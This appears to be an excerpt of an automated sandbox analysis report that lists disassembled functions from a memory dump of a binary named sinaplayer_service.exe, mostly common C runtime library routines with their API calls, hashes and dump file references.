                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 6d6395948eedd5649a624c3172034b6550d85d7bc18a98dec504bf27fb883ff1
                                                                                                                                                                                                    • Instruction ID: 89bf8614ac9711e7c31002f4680a4fada1599f490460fc4f468a3f2e1dda42ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d6395948eedd5649a624c3172034b6550d85d7bc18a98dec504bf27fb883ff1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F0E23864C60A86EB157F76D800A777728AF6137CB114255E5284B2D8EFF1884086B2
                                                                                                                                                                                                    Function 6D0AE3AD Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _strnicmp_l.MSVCR120(?,?,?,00000000), ref: 6D0AE3C9
                                                                                                                                                                                                      • Part of subcall function 6D0AE311: _tolower_l.MSVCR120(00000000,00000000,?,?,?,?), ref: 6D0AE370
                                                                                                                                                                                                      • Part of subcall function 6D0AE311: _tolower_l.MSVCR120(00000000,00000000,00000000,00000000,?,?,?,?), ref: 6D0AE37F
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DAB39
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0DAB44
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _tolower_l$_errno_invalid_parameter_noinfo_strnicmp_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1343604086-0
                                                                                                                                                                                                    • Opcode ID: 2a616fff980378da710401201bd654815bcb04ce689c1529878a6fa99e88f446
                                                                                                                                                                                                    • Instruction ID: 3fed83f1bd448d40bd54b1f513d149cac8579486c685dcbd459af52ea1f623e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a616fff980378da710401201bd654815bcb04ce689c1529878a6fa99e88f446
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F0B432144209DFFF125E94DC007EE33A4BB21374F618522F6344A1E1D7B58491DBA1
                                                                                                                                                                                                    Function 6D11BF3D Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11BF50
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11BF5B
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11BF77
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11BF82
                                                                                                                                                                                                    • __wcsncoll_l.LIBCMT(?,?,?,00000000), ref: 6D11BF9D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__wcsncoll_l_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2322608260-0
                                                                                                                                                                                                    • Opcode ID: 9048df11a09cac73ca56e41393298d09e4174034090df3f67e34ad9472d9ca24
                                                                                                                                                                                                    • Instruction ID: 2ca7e7be71f5d0d275bb529da6c3a8f6384eedd536172155922d614d1739c114
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9048df11a09cac73ca56e41393298d09e4174034090df3f67e34ad9472d9ca24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF0303154C11ADBEB125E64DD003AA3764AB16375F128171B6384E2E4D7F54590DFA2
                                                                                                                                                                                                    Function 6D11B83A Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11B84D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11B858
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11B874
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11B87F
                                                                                                                                                                                                    • __strncoll_l.LIBCMT(?,?,?,00000000), ref: 6D11B89A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__strncoll_l_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3877343156-0
                                                                                                                                                                                                    • Opcode ID: b072af694846e81dd1833e7b412c19a71739757fe900d57f94dcbdfba369cc2d
                                                                                                                                                                                                    • Instruction ID: f2928aec3f6917b970dbada910b4e664b94de5b82a4b9f8da690017b95b30161
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b072af694846e81dd1833e7b412c19a71739757fe900d57f94dcbdfba369cc2d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9F0303164C219DBEB126E98DD007A93764AB23BB5F118171F6340A2E4CBF54490DBA2
                                                                                                                                                                                                    Function 6D094D4B Relevance: 7.5, APIs: 5, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D094D84
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFCE
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFD6
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFE6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFF1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: 8516f030c5f9eae61032456cb8ec945fa1444281a3f6e10dd26f368008d81d54
                                                                                                                                                                                                    • Instruction ID: 8c72a29b4a19721b2b7103853a92f2a01240e2e2a908dcce1124df59e438a15f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8516f030c5f9eae61032456cb8ec945fa1444281a3f6e10dd26f368008d81d54
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F0E2352192049FF71A9F68D85073837B8AF0232DF521249F2398F7E1D7BAD8409B62
                                                                                                                                                                                                    Function 6D101C8C Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D101C95
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D101CA0
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D101CB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D101CBD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: b44530d45fed6bfb9e2749c3a7c2443ccc1c9b57e117419d4663897ddb75d736
                                                                                                                                                                                                    • Instruction ID: 86961ae003768fbe3b12e811c14173e184d910f0b7f7aa66d00487a80f20dfea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b44530d45fed6bfb9e2749c3a7c2443ccc1c9b57e117419d4663897ddb75d736
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF0A0315189094AC7016F78EC003AA76E8AF1137CF228724E538CF2E4DFF9D8C09A61
                                                                                                                                                                                                    Function 6D0B58DA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000), ref: 6D0B5ABD
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000), ref: 6D0B5AC8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: 0$9
                                                                                                                                                                                                    • API String ID: 2959964966-1975997740
                                                                                                                                                                                                    • Opcode ID: cd62422730b521351ccae7b83fa2628733437cbe65d02bb2d51c6adab8f7ff35
                                                                                                                                                                                                    • Instruction ID: f57266f4cb4a072ceded276814dae3342ede3d6f37ea212bf7cedc2c05ce542a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd62422730b521351ccae7b83fa2628733437cbe65d02bb2d51c6adab8f7ff35
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFA18C79E1825A8BEB15CFA9C4843FDFBF1FF05304F54816AD419AB284E7769845CB80
                                                                                                                                                                                                    Function 6D093DB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 248COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 0$g
                                                                                                                                                                                                    • API String ID: 0-4178848223
                                                                                                                                                                                                    • Opcode ID: 1cd0bc1bd83b1070691577364e05e62d953465f98580e63b56d53afd16ddba9a
                                                                                                                                                                                                    • Instruction ID: a16b13da3463a7375a6f945cc066030b5e3f94eb2140a0284b72225597676db5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cd0bc1bd83b1070691577364e05e62d953465f98580e63b56d53afd16ddba9a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3091E5B1D0921E9EFB208A94CC987BEB7F4FB49310F1461D9D51CAB141D7359E81AF40
                                                                                                                                                                                                    Function 6D0B6AE2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 6D0B6B72
                                                                                                                                                                                                      • Part of subcall function 6D0C6295: __87except.LIBCMT ref: 6D0C62D0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                                                                                    • Opcode ID: a0c341b4e956c37144ab13a128492a4ddfeeb11b87ba7cedb50d1fb791f4603b
                                                                                                                                                                                                    • Instruction ID: 628095a2b7bb56528bc669058719f07229d813b4087e7e10aa5287a83e114a12
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0c341b4e956c37144ab13a128492a4ddfeeb11b87ba7cedb50d1fb791f4603b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44511561A1C20786FB12A714C91077E3BF4EB42714FE08969E4D58B2B8DB3784D58EC7
                                                                                                                                                                                                    Function 6D0A2E64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6D0DB64A
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0DB651
                                                                                                                                                                                                      • Part of subcall function 6D0B01E3: DName::DName.LIBCMT ref: 6D0B029A
                                                                                                                                                                                                      • Part of subcall function 6D0B01E3: DName::operator+.LIBCMT ref: 6D0B02A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::Name::operator+
                                                                                                                                                                                                    • String ID: CV:
                                                                                                                                                                                                    • API String ID: 2649573449-3725821052
                                                                                                                                                                                                    • Opcode ID: 7e7c4a76bfc01d806e71240a08227e6f454687cd83089c4cc6194d21a8cac9f8
                                                                                                                                                                                                    • Instruction ID: a7e5779484c11fa911c0397d3cef96378ed3a51848658d0af63f41f3d9180866
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e7c4a76bfc01d806e71240a08227e6f454687cd83089c4cc6194d21a8cac9f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A541D2359882869FFB15CFFAD481BBA7BF6AF0A301F09506ED41187292D7B49881CB10
                                                                                                                                                                                                    Function 6D0FA621 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0F3608: TlsGetValue.KERNEL32(6D0E98A4), ref: 6D0F361A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0FA65B
                                                                                                                                                                                                    • swprintf_s.MSVCR120(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA685
                                                                                                                                                                                                    • vswprintf.LIBCMT(00000401,00000401,?,6D0FA4C1,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA6AD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThreadValueswprintf_svswprintf
                                                                                                                                                                                                    • String ID: [%d:%d:%d:%d(%d)]
                                                                                                                                                                                                    • API String ID: 281614720-3832470304
                                                                                                                                                                                                    • Opcode ID: 8583332a4ed687a0647995c60f8c44059e0b103e4026ed90aa35d9fbef200eb1
                                                                                                                                                                                                    • Instruction ID: 376238d95d3be1c57c811feb0885692888b651284afc60bd119a6fd3e6057aca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8583332a4ed687a0647995c60f8c44059e0b103e4026ed90aa35d9fbef200eb1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E621F135200202AFE7059BA8C885F7B77F9EF88340B75446DFA16C7260EBB199528790
                                                                                                                                                                                                    Function 6D0B1D5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe,00000104,?,?,?,?,?,?,6D0B0E43), ref: 6D0B1D7A
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6D0B1DC9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe$y[
                                                                                                                                                                                                    • API String ID: 2373854079-1468285253
                                                                                                                                                                                                    • Opcode ID: e4bdc908308af44aa47061e21bfca6075cf8a95d53c5ef3d06b00c025d43f477
                                                                                                                                                                                                    • Instruction ID: 17702d436238bde4c05f2a81737908e6b0fb5304c0451b87fbdf1aea89ff3491
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4bdc908308af44aa47061e21bfca6075cf8a95d53c5ef3d06b00c025d43f477
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D1196B1D08504ABE710CBA8D885EAF77BCEA4A325751026AE521D3150E7B29A00C7E2
                                                                                                                                                                                                    Function 6D0A82D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000001CA,97AFC1B1,00000000,00000055,00000000,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A82EF
